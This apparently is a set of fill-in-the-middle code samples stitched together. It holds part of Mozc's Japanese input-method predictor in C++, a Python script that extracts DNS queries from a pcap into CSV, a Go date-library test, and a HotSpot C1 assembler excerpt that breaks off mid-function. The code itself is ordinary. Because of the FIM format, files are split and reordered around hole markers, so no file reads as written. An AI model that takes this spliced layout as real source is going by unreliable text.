// ex) "六本木"+"ヒルズ"->"レジデンス"
std::string history_key, history_value;
if (!GetHistoryKeyAndValue(segments, &history_key, &history_value)) {
return;
}
AddBigramResultsFromHistory(history_key, history_value, request, segments,
source_info, results);
}
void DictionaryPredictor::AddBigramResultsFromHistory(
const std::string &history_key, const std::string &history_value,
const ConversionRequest &request, const Segments &segments,
Segment::Candidate::SourceInfo source_info,
std::vector<Result> *results) const {
// Check that history_key/history_value are in the dictionary.
FindValueCallback find_history_callback(history_value);
dictionary_->LookupPrefix(history_key, request, &find_history_callback);
// History value is not found in the dictionary.
// User may create this the history candidate from T13N or segment
// expand/shrinkg operations.
if (!find_history_callback.found()) {
return;
}
const size_t cutoff_threshold = GetCandidateCutoffThreshold(segments);
const size_t prev_results_size = results->size();
GetPredictiveResultsForBigram(*dictionary_, history_key, history_value,
request, segments, BIGRAM, cutoff_threshold,
source_info, unknown_id_, results);
const size_t bigram_results_size = results->size() - prev_results_size;
// if size reaches max_results_size,
// we don't show the candidates, since disambiguation from
// 256 candidates is hard. (It may exceed max_results_size, because this is
// just a limit for each backend, so total number may be larger)
if (bigram_results_size >= cutoff_threshold) {
results->resize(prev_results_size);
return;
}
// Obtain the character type of the last history value.
const size_t history_value_size = Util::CharsLen(history_value);
if (history_value_size == 0) {
return;
}
const Util::ScriptType history_ctype = Util::GetScriptType(history_value);
const Util::ScriptType last_history_ctype = Util::GetScriptType(
Util::Utf8SubString(history_value, history_value_size - 1, 1));
for (size_t i = prev_results_size; i < results->size(); ++i) {
CheckBigramResult(find_history_callback.token(), history_ctype,
last_history_ctype, request, &(*results)[i]);
}
}
// Filter out irrelevant bigrams. For example, we don't want to
// suggest "リカ" from the history "アメ".
void DictionaryPredictor::CheckBigramResult(
const Token &history_token, const Util::ScriptType history_ctype,
const Util::ScriptType last_history_ctype, const ConversionRequest &request,
Result *result) const {
DCHECK(result);
const std::string &history_key = history_token.key;
const std::string &history_value = history_token.value;
const std::string key(result->key, history_key.size(),
result->key.size() - history_key.size());
const std::string value(result->value, history_value.size(),
result->value.size() - history_value.size());
// Don't suggest 0-length key/value.
if (key.empty() || value.empty()) {
result->removed = true;
MOZC_WORD_LOG(*result, "Removed. key, value or both are empty.");
return;
}
const Util::ScriptType ctype =
Util::GetScriptType(Util::Utf8SubString(value, 0, 1));
if (history_ctype == Util::KANJI && ctype == Util::KATAKANA) {
// Do not filter "六本木ヒルズ"
MOZC_WORD_LOG(*result, "Valid bigram. Kanji + Katakana pattern.");
return;
}
// If freq("アメ") < freq("アメリカ"), we don't
// need to suggest it. As "アメリカ" should already be
// suggested when user type "アメ".
// Note that wcost = -500 * log(prob).
if (ctype != Util::KANJI && history_token.cost > result->wcost) {
result->removed = true;
MOZC_WORD_LOG(*result,
"Removed. The prefix's score is lower than the whole.");
return;
}
// If character type doesn't change, this boundary might NOT
// be a word boundary. Only use iif the entire key is reasonably long.
const size_t key_len = Util::CharsLen(result->key);
if (ctype == last_history_ctype &&
((ctype == Util::HIRAGANA && key_len <= 9) ||
(ctype == Util::KATAKANA && key_len <= 5))) {
result->removed = true;
MOZC_WORD_LOG(*result, "Removed. Short Hiragana (<= 9) or Katakana (<= 5)");
return;
}
// The suggested key/value pair must exist in the dictionary.
// For example, we don't want to suggest "ターネット" from
// the history "イン".
// If character type is Kanji and the suggestion is not a
// zero_query_suggestion, we relax this condition, as there are
// many Kanji-compounds which may not in the dictionary. For example,
// we want to suggest "霊長類研究所" from the history "京都大学".
if (ctype == Util::KANJI && Util::CharsLen(value) >= 2) {
// Do not filter this.
// TODO(toshiyuki): one-length kanji prediciton may be annoying other than
// some exceptions, "駅", "口", etc
MOZC_WORD_LOG(*result, "Valid bigram. Kanji suffix (>= 2).");
return;
}
// Check if the word is in the dictionary or not.
// For Hiragana words, check if that word is in a key of values.
// This is for a situation that
// ありがとうございました is not in the dictionary, but
// ありがとう御座いました is in the dictionary.
if (ctype == Util::HIRAGANA) {
if (!dictionary_->HasKey(key)) {
result->removed = true;
MOZC_WORD_LOG(*result, "Removed. No keys are found.");
return;
}
} else {
FindValueCallback callback(value);
dictionary_->LookupPrefix(key, request, &callback);
if (!callback.found()) {
result->removed = true;
MOZC_WORD_LOG(*result, "Removed. No prefix found.");
return;
}
}
MOZC_WORD_LOG(*result, "Valid bigram.");
}
void DictionaryPredictor::GetPredictiveResults(
const DictionaryInterface &dictionary, const std::string &history_key,
const ConversionRequest &request, const Segments &segments,
PredictionTypes types, size_t lookup_limit,
Segment::Candidate::SourceInfo source_info, int unknown_id_,
std::vector<Result> *results) {
if (!request.has_composer()) {
std::string input_key = history_key;
input_key.append(segments.conversion_segment(0).key());
PredictiveLookupCallback callback(types, lookup_limit, input_key.size(),
nullptr, source_info, unknown_id_, "",
GetSpatialCostParams(request), results);
dictionary.LookupPredictive(input_key, request, &callback);
return;
}
// If we have ambiguity for the input, get expanded key.
// Example1 roman input: for "あk", we will get |base|, "あ" and |expanded|,
// "か", "き", etc
// Example2 kana input: for "あか", we will get |base|, "あ" and |expanded|,
// "か", and "が".
std::string base;
std::set<std::string> expanded;
request.composer().GetQueriesForPrediction(&base, &expanded);
std::string input_key;
if (expanded.empty()) {
input_key.assign(history_key).append(base);
PredictiveLookupCallback callback(types, lookup_limit, input_key.size(),
nullptr, source_info, unknown_id_, "",
GetSpatialCostParams(request), results);
dictionary.LookupPredictive(input_key, request, &callback);
return;
}
// `non_expanded_original_key` keeps the original key request before
// key expansions. This key is passed to the callback so that it can
// identify whether the key is actually expanded or not.
const std::string non_expanded_original_key =
IsEnableNewSpatialScoring(request)
? history_key + segments.conversion_segment(0).key()
: "";
// |expanded| is a very small set, so calling LookupPredictive multiple
// times is not so expensive. Also, the number of lookup results is limited
// by |lookup_limit|.
for (const std::string &expanded_char : expanded) {
input_key.assign(history_key).append(base).append(expanded_char);
PredictiveLookupCallback callback(types, lookup_limit, input_key.size(),
nullptr, source_info, unknown_id_,
non_expanded_original_key,
GetSpatialCostParams(request), results);
dictionary.LookupPredictive(input_key, request, &callback);
}
}
void DictionaryPredictor::GetPredictiveResultsForBigram(
const DictionaryInterface &dictionary, const std::string &history_key,
const std::string &history_value, const ConversionRequest &request,
const Segments &segments, PredictionTypes types, size_t lookup_limit,
Segment::Candidate::SourceInfo source_info, int unknown_id_,
std::vector<Result> *results) const {
if (!request.has_composer()) {
std::string input_key = history_key;
input_key.append(segments.conversion_segment(0).key());
PredictiveBigramLookupCallback callback(
types, lookup_limit, input_key.size(), nullptr, history_value,
source_info, unknown_id_, "", GetSpatialCostParams(request), results);
dictionary.LookupPredictive(input_key, request, &callback);
return;
}
// If we have ambiguity for the input, get expanded key.
// Example1 roman input: for "あk", we will get |base|, "あ" and |expanded|,
// "か", "き", etc
// Example2 kana input: for "あか", we will get |base|, "あ" and |expanded|,
// "か", and "が".
std::string base;
std::set<std::string> expanded;
request.composer().GetQueriesForPrediction(&base, &expanded);
const std::string input_key = history_key + base;
const std::string non_expanded_original_key =
IsEnableNewSpatialScoring(request)
? history_key + segments.conversion_segment(0).key()
: "";
PredictiveBigramLookupCallback callback(
types, lookup_limit, input_key.size(),
expanded.empty() ? nullptr : &expanded, history_value, source_info,
unknown_id_, non_expanded_original_key, GetSpatialCostParams(request),
results);
dictionary.LookupPredictive(input_key, request, &callback);
}
void DictionaryPredictor::GetPredictiveResultsForEnglishKey(
const DictionaryInterface &dictionary, const ConversionRequest &request,
const std::string &input_key, PredictionTypes types, size_t lookup_limit,
std::vector<Result> *results) const {
const size_t prev_results_size = results->size();
if (Util::IsUpperAscii(input_key)) {
// For upper case key, look up its lower case version and then transform
// the results to upper case.
std::string key(input_key);
Util::LowerString(&key);
PredictiveLookupCallback callback(types, lookup_limit, key.size(), nullptr,
Segment::Candidate::SOURCE_INFO_NONE,
unknown_id_, "",
GetSpatialCostParams(request), results);
dictionary.LookupPredictive(key, request, &callback);
for (size_t i = prev_results_size; i < results->size(); ++i) {
Util::UpperString(&(*results)[i].value);
}
} else if (Util::IsCapitalizedAscii(input_key)) {
// For capitalized key, look up its lower case version and then transform
// the results to capital.
std::string key(input_key);
Util::LowerString(&key);
PredictiveLookupCallback callback(types, lookup_limit, key.size(), nullptr,
Segment::Candidate::SOURCE_INFO_NONE,
unknown_id_, "",
GetSpatialCostParams(request), results);
dictionary.LookupPredictive(key, request, &callback);
for (size_t i = prev_results_size; i < results->size(); ++i) {
Util::CapitalizeString(&(*results)[i].value);
}
} else {
// For other cases (lower and as-is), just look up directly.
PredictiveLookupCallback callback(
types, lookup_limit, input_key.size(), nullptr,
Segment::Candidate::SOURCE_INFO_NONE, unknown_id_, "",
GetSpatialCostParams(request), results);
dictionary.LookupPredictive(input_key, request, &callback);
}
// If input mode is FULL_ASCII, then convert the results to full-width.
if (request.has_composer() &&
request.composer().GetInputMode() == transliteration::FULL_ASCII) {
std::string tmp;
for (size_t i = prev_results_size; i < results->size(); ++i) {
tmp.assign((*results)[i].value);
japanese_util::HalfWidthAsciiToFullWidthAscii(tmp, &(*results)[i].value);
}
}
}
void DictionaryPredictor::GetPredictiveResultsUsingTypingCorrection(
const DictionaryInterface &dictionary, const std::string &history_key,
const ConversionRequest &request, const Segments &segments,
PredictionTypes types, size_t lookup_limit,
std::vector<Result> *results) const {
if (!request.has_composer()) {
return;
}
std::vector<composer::TypeCorrectedQuery> queries;
request.composer().GetTypeCorrectedQueriesForPrediction(&queries);
for (size_t query_index = 0; query_index < queries.size(); ++query_index) {
const composer::TypeCorrectedQuery &query = queries[query_index];
const std::string input_key = history_key + query.base;
const size_t previous_results_size = results->size();
PredictiveLookupCallback callback(
types, lookup_limit, input_key.size(),
query.expanded.empty() ? nullptr : &query.expanded,
Segment::Candidate::SOURCE_INFO_NONE, unknown_id_, "",
GetSpatialCostParams(request), results);
dictionary.LookupPredictive(input_key, request, &callback);
for (size_t i = previous_results_size; i < results->size(); ++i) {
(*results)[i].wcost += query.cost;
}
lookup_limit -= results->size() - previous_results_size;
if (lookup_limit <= 0) {
break;
}
}
}
// static
bool DictionaryPredictor::GetZeroQueryCandidatesForKey(
const ConversionRequest &request, const std::string &key,
const ZeroQueryDict &dict, std::vector<ZeroQueryResult> *results) {
const int32_t available_emoji_carrier =
request.request().available_emoji_carrier();
DCHECK(results);
results->clear();
auto range = dict.equal_range(key);
if (range.first == range.second) {
return false;
}
for (; range.first != range.second; ++range.first) {
const auto &entry = range.first;
if (entry.type() != ZERO_QUERY_EMOJI) {
results->push_back(
std::make_pair(std::string(entry.value()), entry.type()));
continue;
}
if (available_emoji_carrier & Request::UNICODE_EMOJI &&
entry.emoji_type() & EMOJI_UNICODE) {
results->push_back(
std::make_pair(std::string(entry.value()), entry.type()));
continue;
}
if ((available_emoji_carrier & Request::DOCOMO_EMOJI &&
entry.emoji_type() & EMOJI_DOCOMO) ||
(available_emoji_carrier & Request::SOFTBANK_EMOJI &&
entry.emoji_type() & EMOJI_SOFTBANK) ||
(available_emoji_carrier & Request::KDDI_EMOJI &&
entry.emoji_type() & EMOJI_KDDI)) {
std::string android_pua;
Util::Ucs4ToUtf8(entry.emoji_android_pua(), &android_pua);
results->push_back(std::make_pair(android_pua, entry.type()));
}
}
return !results->empty();
}
// static
void DictionaryPredictor::AppendZeroQueryToResults(
const std::vector<ZeroQueryResult> &candidates, uint16_t lid, uint16_t rid,
std::vector<Result> *results) {
int cost = 0;
for (size_t i = 0; i < candidates.size(); ++i) {
// Increment cost to show the candidates in order.
constexpr int kSuffixPenalty = 10;
results->push_back(Result());
Result *result = &results->back();
result->SetTypesAndTokenAttributes(SUFFIX, Token::NONE);
result->SetSourceInfoForZeroQuery(candidates[i].second);
result->key = candidates[i].first;
result->value = candidates[i].first;
result->wcost = cost;
result->lid = lid;
result->rid = rid;
cost += kSuffixPenalty;
}
}
// Returns true if we add zero query result.
bool DictionaryPredictor::AggregateNumberZeroQueryPrediction(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
std::string number_key;
if (!GetNumberHistory(segments, &number_key)) {
return false;
}
std::vector<ZeroQueryResult> candidates_for_number_key;
GetZeroQueryCandidatesForKey(request, number_key, zero_query_number_dict_,
&candidates_for_number_key);
std::vector<ZeroQueryResult> default_candidates_for_number;
GetZeroQueryCandidatesForKey(request, "default", zero_query_number_dict_,
&default_candidates_for_number);
DCHECK(!default_candidates_for_number.empty());
AppendZeroQueryToResults(candidates_for_number_key, counter_suffix_word_id_,
counter_suffix_word_id_, results);
AppendZeroQueryToResults(default_candidates_for_number,
counter_suffix_word_id_, counter_suffix_word_id_,
results);
return true;
}
// Returns true if we add zero query result.
bool DictionaryPredictor::AggregateZeroQueryPrediction(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
const size_t history_size = segments.history_segments_size();
if (history_size <= 0) {
return false;
}
const Segment &last_segment = segments.history_segment(history_size - 1);
DCHECK_GT(last_segment.candidates_size(), 0);
const std::string &history_value = last_segment.candidate(0).value;
std::vector<ZeroQueryResult> candidates;
if (!GetZeroQueryCandidatesForKey(request, history_value, zero_query_dict_,
&candidates)) {
return false;
}
const uint16_t kId = 0; // EOS
AppendZeroQueryToResults(candidates, kId, kId, results);
return true;
}
void DictionaryPredictor::AggregateSuffixPrediction(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK_GT(segments.conversion_segments_size(), 0);
DCHECK(!segments.conversion_segment(0).key().empty()); // Not zero query
// Uses larger cutoff (kPredictionMaxResultsSize) in order to consider
// all suffix entries.
const size_t cutoff_threshold = kPredictionMaxResultsSize;
const std::string kEmptyHistoryKey = "";
GetPredictiveResults(*suffix_dictionary_, kEmptyHistoryKey, request, segments,
SUFFIX, cutoff_threshold,
Segment::Candidate::SOURCE_INFO_NONE, unknown_id_,
results);
}
void DictionaryPredictor::AggregateZeroQuerySuffixPrediction(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK_GT(segments.conversion_segments_size(), 0);
DCHECK(segments.conversion_segment(0).key().empty());
if (AggregateNumberZeroQueryPrediction(request, segments, results)) {
return;
}
AggregateZeroQueryPrediction(request, segments, results);
if (IsLatinInputMode(request)) {
// We do not want zero query results from suffix dictionary for Latin
// input mode. For example, we do not need "です", "。" just after "when".
return;
}
// Uses larger cutoff (kPredictionMaxResultsSize) in order to consider
// all suffix entries.
const size_t cutoff_threshold = kPredictionMaxResultsSize;
const std::string kEmptyHistoryKey = "";
GetPredictiveResults(
*suffix_dictionary_, kEmptyHistoryKey, request, segments, SUFFIX,
cutoff_threshold,
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_SUFFIX, unknown_id_,
results);
}
void DictionaryPredictor::AggregateEnglishPrediction(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK(results);
DCHECK(dictionary_);
const size_t cutoff_threshold = GetCandidateCutoffThreshold(segments);
const size_t prev_results_size = results->size();
const std::string &input_key = segments.conversion_segment(0).key();
GetPredictiveResultsForEnglishKey(*dictionary_, request, input_key, ENGLISH,
cutoff_threshold, results);
size_t unigram_results_size = results->size() - prev_results_size;
if (unigram_results_size >= cutoff_threshold) {
results->resize(prev_results_size);
return;
}
}
void DictionaryPredictor::AggregateEnglishPredictionUsingRawInput(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK(results);
DCHECK(dictionary_);
if (!request.has_composer()) {
return;
}
const size_t cutoff_threshold = GetCandidateCutoffThreshold(segments);
const size_t prev_results_size = results->size();
std::string input_key;
request.composer().GetRawString(&input_key);
GetPredictiveResultsForEnglishKey(*dictionary_, request, input_key, ENGLISH,
cutoff_threshold, results);
size_t unigram_results_size = results->size() - prev_results_size;
if (unigram_results_size >= cutoff_threshold) {
results->resize(prev_results_size);
return;
}
}
void DictionaryPredictor::AggregateTypeCorrectingPrediction(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK(results);
DCHECK(dictionary_);
const size_t prev_results_size = results->size();
if (prev_results_size > 10000) {
return;
}
const size_t cutoff_threshold = GetCandidateCutoffThreshold(segments);
// Currently, history key is never utilized.
const std::string kEmptyHistoryKey = "";
GetPredictiveResultsUsingTypingCorrection(
*dictionary_, kEmptyHistoryKey, request, segments, TYPING_CORRECTION,
cutoff_threshold, results);
if (results->size() - prev_results_size >= cutoff_threshold) {
results->resize(prev_results_size);
return;
}
}
bool DictionaryPredictor::ShouldAggregateRealTimeConversionResults(
const ConversionRequest &request, const Segments &segments) {
constexpr size_t kMaxRealtimeKeySize = 300; // 300 bytes in UTF8
const std::string &key = segments.conversion_segment(0).key();
if (key.empty() || key.size() >= kMaxRealtimeKeySize) {
// 1) If key is empty, realtime conversion doesn't work.
// 2) If the key is too long, we'll hit a performance issue.
return false;
}
return (segments.request_type() == Segments::PARTIAL_SUGGESTION ||
request.config().use_realtime_conversion() ||
IsMixedConversionEnabled(request.request()));
}
bool DictionaryPredictor::IsZipCodeRequest(const std::string &key) {
if (key.empty()) {
return false;
}
for (ConstChar32Iterator iter(key); !iter.Done(); iter.Next()) {
const char32 c = iter.Get();
if (!('0' <= c && c <= '9') && (c != '-')) {
return false;
}
}
return true;
}
} // namespace mozc
#undef MOZC_WORD_LOG_MESSAGE
#undef MOZC_WORD_LOG<|fim▁end|>
|
SetTypesAndTokenAttributes(types, token.attributes);
key = token.key;
value = token.value;
wcost = token.cost;
|
<|file_name|>dns-pcap-to-csv.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python2
#
# Copyright 2016 Philipp Winter <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Turn pcap into csv file.
Extract timestamp, source IP address, and query name of all DNS queries in the
given pcap, and turn it into a CSV.
"""<|fim▁hole|>
# We exclude the following two measurement hosts.
MEASUREMENT_HOSTS = frozenset(["92.243.1.186", "198.83.85.34"])
def process_file(pcap_file):
packets = scapy.rdpcap(pcap_file)
for packet in packets:
if not packet.haslayer(scapy.IP):
continue
if not packet.haslayer(scapy.DNSQR):
continue
query = packet[scapy.DNSQR].qname
src_addr = packet[scapy.IP].src
# Skip DNS response.
if src_addr in MEASUREMENT_HOSTS:
continue
print "%s,%s,%s" % (packet.time, packet[scapy.IP].src, query.lower())
return 0
if __name__ == "__main__":
if len(sys.argv) != 2:
print >> sys.stderr, "\nUsage: %s PCAP_FILE\n" % sys.argv[0]
sys.exit(1)
pcap_file = sys.argv[1]
sys.exit(process_file(pcap_file))<|fim▁end|>
|
import sys
import scapy.all as scapy
|
<|file_name|>beginning_test.go<|end_file_name|><|fim▁begin|>package datedsl
import (
"testing"
"time"
"github.com/stretchr/testify/assert"
)
func TestBeginningOfSecond(t *testing.T) {
value := New(parse("Fri Jul 17 10:13:59 MST 2015")).BeginningOfSecond()
expected := parse("Fri Jul 17 10:13:59 MST 2015")
assert.Equal(t, expected.String(), value.String())
assert.Equal(t, 0, value.Value().Nanosecond())
}<|fim▁hole|> expected := parse("Fri Jul 17 10:13:00 MST 2015")
assert.Equal(t, expected.String(), value.String())
}
func TestBeginningOfHour(t *testing.T) {
value := New(parse("Fri Jul 17 10:13:59 MST 2015")).BeginningOfHour()
expected := parse("Fri Jul 17 10:00:00 MST 2015")
assert.Equal(t, expected.String(), value.String())
}
func TestBeginningOfDay(t *testing.T) {
value := New(parse("Fri Jul 17 10:13:59 MST 2015")).BeginningOfDay()
expected := parse("Fri Jul 17 00:00:00 MST 2015")
assert.Equal(t, expected.String(), value.String())
}
func TestFirstDayOfMonth(t *testing.T) {
value := New(parse("Fri Jul 17 09:54:37 MST 2015")).BeginningOfMonth()
expected := parse("Wed Jul 1 00:00:00 MST 2015")
assert.Equal(t, expected.String(), value.String())
}
func TestFirstDayOfYear(t *testing.T) {
value := New(parse("Fri Jul 17 09:54:37 MST 2015")).BeginningOfYear()
expected := parse("Thu Jan 1 00:00:00 MST 2015")
assert.Equal(t, expected.String(), value.String())
}
func parse(s string) time.Time {
t, _ := time.Parse(time.UnixDate, s)
return t
}<|fim▁end|>
|
func TestBeginningOfMinute(t *testing.T) {
value := New(parse("Fri Jul 17 10:13:59 MST 2015")).BeginningOfMinute()
|
<|file_name|>c1_LIRAssembler.cpp<|end_file_name|><|fim▁begin|>/*
* Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*
*/
#include "precompiled.hpp"
#include "c1/c1_Compilation.hpp"
#include "c1/c1_Instruction.hpp"
#include "c1/c1_InstructionPrinter.hpp"
#include "c1/c1_LIRAssembler.hpp"
#include "c1/c1_MacroAssembler.hpp"
#include "c1/c1_ValueStack.hpp"
#include "ci/ciInstance.hpp"
#include "runtime/os.hpp"
void LIR_Assembler::patching_epilog(PatchingStub* patch, LIR_PatchCode patch_code, Register obj, CodeEmitInfo* info) {
// We must have enough patching space so that call can be inserted.
// We cannot use fat nops here, since the concurrent code rewrite may transiently
// create the illegal instruction sequence.
while ((intx) _masm->pc() - (intx) patch->pc_start() < NativeGeneralJump::instruction_size) {
_masm->nop();
}
patch->install(_masm, patch_code, obj, info);
append_code_stub(patch);
#ifdef ASSERT
Bytecodes::Code code = info->scope()->method()->java_code_at_bci(info->stack()->bci());
if (patch->id() == PatchingStub::access_field_id) {
switch (code) {
case Bytecodes::_putstatic:
case Bytecodes::_getstatic:
case Bytecodes::_putfield:
case Bytecodes::_getfield:
break;
default:
ShouldNotReachHere();
}
} else if (patch->id() == PatchingStub::load_klass_id) {
switch (code) {
case Bytecodes::_new:
case Bytecodes::_anewarray:
case Bytecodes::_multianewarray:
case Bytecodes::_instanceof:
case Bytecodes::_checkcast:
break;
default:
ShouldNotReachHere();
}
} else if (patch->id() == PatchingStub::load_mirror_id) {
switch (code) {
case Bytecodes::_putstatic:
case Bytecodes::_getstatic:
case Bytecodes::_ldc:
case Bytecodes::_ldc_w:
break;
default:
ShouldNotReachHere();
}
} else if (patch->id() == PatchingStub::load_appendix_id) {
Bytecodes::Code bc_raw = info->scope()->method()->raw_code_at_bci(info->stack()->bci());
assert(Bytecodes::has_optional_appendix(bc_raw), "unexpected appendix resolution");
} else {
ShouldNotReachHere();
}
#endif
}
PatchingStub::PatchID LIR_Assembler::patching_id(CodeEmitInfo* info) {
IRScope* scope = info->scope();
Bytecodes::Code bc_raw = scope->method()->raw_code_at_bci(info->stack()->bci());
if (Bytecodes::has_optional_appendix(bc_raw)) {
return PatchingStub::load_appendix_id;
}
return PatchingStub::load_mirror_id;
}
//---------------------------------------------------------------
LIR_Assembler::LIR_Assembler(Compilation* c):
_compilation(c)
, _masm(c->masm())
, _bs(Universe::heap()->barrier_set())
, _frame_map(c->frame_map())
, _current_block(NULL)
, _pending_non_safepoint(NULL)
, _pending_non_safepoint_offset(0)
{
_slow_case_stubs = new CodeStubList();
}
LIR_Assembler::~LIR_Assembler() {
}
void LIR_Assembler::check_codespace() {
CodeSection* cs = _masm->code_section();
if (cs->remaining() < (int)(NOT_LP64(1*K)LP64_ONLY(2*K))) {
BAILOUT("CodeBuffer overflow");
}
}
void LIR_Assembler::append_code_stub(CodeStub* stub) {
_slow_case_stubs->append(stub);
}
void LIR_Assembler::emit_stubs(CodeStubList* stub_list) {
for (int m = 0; m < stub_list->length(); m++) {
CodeStub* s = (*stub_list)[m];
check_codespace();
CHECK_BAILOUT();
#ifndef PRODUCT
if (CommentedAssembly) {
stringStream st;<|fim▁hole|> _masm->block_comment(st.as_string());
}
#endif
s->emit_code(this);
#ifdef ASSERT
s->assert_no_unbound_labels();
#endif
}
}
void LIR_Assembler::emit_slow_case_stubs() {
emit_stubs(_slow_case_stubs);
}
bool LIR_Assembler::needs_icache(ciMethod* method) const {
return !method->is_static();
}
int LIR_Assembler::code_offset() const {
return _masm->offset();
}
address LIR_Assembler::pc() const {
return _masm->pc();
}
// To bang the stack of this compiled method we use the stack size
// that the interpreter would need in case of a deoptimization. This
// removes the need to bang the stack in the deoptimization blob which
// in turn simplifies stack overflow handling.
int LIR_Assembler::bang_size_in_bytes() const {
return MAX2(initial_frame_size_in_bytes() + os::extra_bang_size_in_bytes(), _compilation->interpreter_frame_size());
}
void LIR_Assembler::emit_exception_entries(ExceptionInfoList* info_list) {
for (int i = 0; i < info_list->length(); i++) {
XHandlers* handlers = info_list->at(i)->exception_handlers();
for (int j = 0; j < handlers->length(); j++) {
XHandler* handler = handlers->handler_at(j);
assert(handler->lir_op_id() != -1, "handler not processed by LinearScan");
assert(handler->entry_code() == NULL ||
handler->entry_code()->instructions_list()->last()->code() == lir_branch ||
handler->entry_code()->instructions_list()->last()->code() == lir_delay_slot, "last operation must be branch");
if (handler->entry_pco() == -1) {
// entry code not emitted yet
if (handler->entry_code() != NULL && handler->entry_code()->instructions_list()->length() > 1) {
handler->set_entry_pco(code_offset());
if (CommentedAssembly) {
_masm->block_comment("Exception adapter block");
}
emit_lir_list(handler->entry_code());
} else {
handler->set_entry_pco(handler->entry_block()->exception_handler_pco());
}
assert(handler->entry_pco() != -1, "must be set now");
}
}
}
}
void LIR_Assembler::emit_code(BlockList* hir) {
if (PrintLIR) {
print_LIR(hir);
}
int n = hir->length();
for (int i = 0; i < n; i++) {
emit_block(hir->at(i));
CHECK_BAILOUT();
}
flush_debug_info(code_offset());
DEBUG_ONLY(check_no_unbound_labels());
}
void LIR_Assembler::emit_block(BlockBegin* block) {
if (block->is_set(BlockBegin::backward_branch_target_flag)) {
align_backward_branch_target();
}
// if this block is the start of an exception handler, record the
// PC offset of the first instruction for later construction of
// the ExceptionHandlerTable
if (block->is_set(BlockBegin::exception_entry_flag)) {
block->set_exception_handler_pco(code_offset());
}
#ifndef PRODUCT
if (PrintLIRWithAssembly) {
// don't print Phi's
InstructionPrinter ip(false);
block->print(ip);
}
#endif /* PRODUCT */
assert(block->lir() != NULL, "must have LIR");
X86_ONLY(assert(_masm->rsp_offset() == 0, "frame size should be fixed"));
#ifndef PRODUCT
if (CommentedAssembly) {
stringStream st;
st.print_cr(" block B%d [%d, %d]", block->block_id(), block->bci(), block->end()->printable_bci());
_masm->block_comment(st.as_string());
}
#endif
emit_lir_list(block->lir());
X86_ONLY(assert(_masm->rsp_offset() == 0, "frame size should be fixed"));
}
void LIR_Assembler::emit_lir_list(LIR_List* list) {
peephole(list);
int n = list->length();
for (int i = 0; i < n; i++) {
LIR_Op* op = list->at(i);
check_codespace();
CHECK_BAILOUT();
#ifndef PRODUCT
if (CommentedAssembly) {
// Don't record out every op since that's too verbose. Print
// branches since they include block and stub names. Also print
// patching moves since they generate funny looking code.
if (op->code() == lir_branch ||
(op->code() == lir_move && op->as_Op1()->patch_code() != lir_patch_none)) {
stringStream st;
op->print_on(&st);
_masm->block_comment(st.as_string());
}
}
if (PrintLIRWithAssembly) {
// print out the LIR operation followed by the resulting assembly
list->at(i)->print(); tty->cr();
}
#endif /* PRODUCT */
op->emit_code(this);
if (compilation()->debug_info_recorder()->recording_non_safepoints()) {
process_debug_info(op);
}
#ifndef PRODUCT
if (PrintLIRWithAssembly) {
_masm->code()->decode();
}
#endif /* PRODUCT */
}
}
#ifdef ASSERT
void LIR_Assembler::check_no_unbound_labels() {
CHECK_BAILOUT();
for (int i = 0; i < _branch_target_blocks.length() - 1; i++) {
if (!_branch_target_blocks.at(i)->label()->is_bound()) {
tty->print_cr("label of block B%d is not bound", _branch_target_blocks.at(i)->block_id());
assert(false, "unbound label");
}
}
}
#endif
//----------------------------------debug info--------------------------------
void LIR_Assembler::add_debug_info_for_branch(CodeEmitInfo* info) {
int pc_offset = code_offset();
flush_debug_info(pc_offset);
info->record_debug_info(compilation()->debug_info_recorder(), pc_offset);
if (info->exception_handlers() != NULL) {
compilation()->add_exception_handlers_for_pco(pc_offset, info->exception_handlers());
}
}
void LIR_Assembler::add_call_info(int pc_offset, CodeEmitInfo* cinfo) {
flush_debug_info(pc_offset);
cinfo->record_debug_info(compilation()->debug_info_recorder(), pc_offset);
if (cinfo->exception_handlers() != NULL) {
compilation()->add_exception_handlers_for_pco(pc_offset, cinfo->exception_handlers());
}
}
static ValueStack* debug_info(Instruction* ins) {
StateSplit* ss = ins->as_StateSplit();
if (ss != NULL) return ss->state();
return ins->state_before();
}
void LIR_Assembler::process_debug_info(LIR_Op* op) {
Instruction* src = op->source();
if (src == NULL) return;
int pc_offset = code_offset();
if (_pending_non_safepoint == src) {
_pending_non_safepoint_offset = pc_offset;
return;
}
ValueStack* vstack = debug_info(src);
if (vstack == NULL) return;
if (_pending_non_safepoint != NULL) {
// Got some old debug info. Get rid of it.
if (debug_info(_pending_non_safepoint) == vstack) {
_pending_non_safepoint_offset = pc_offset;
return;
}
if (_pending_non_safepoint_offset < pc_offset) {
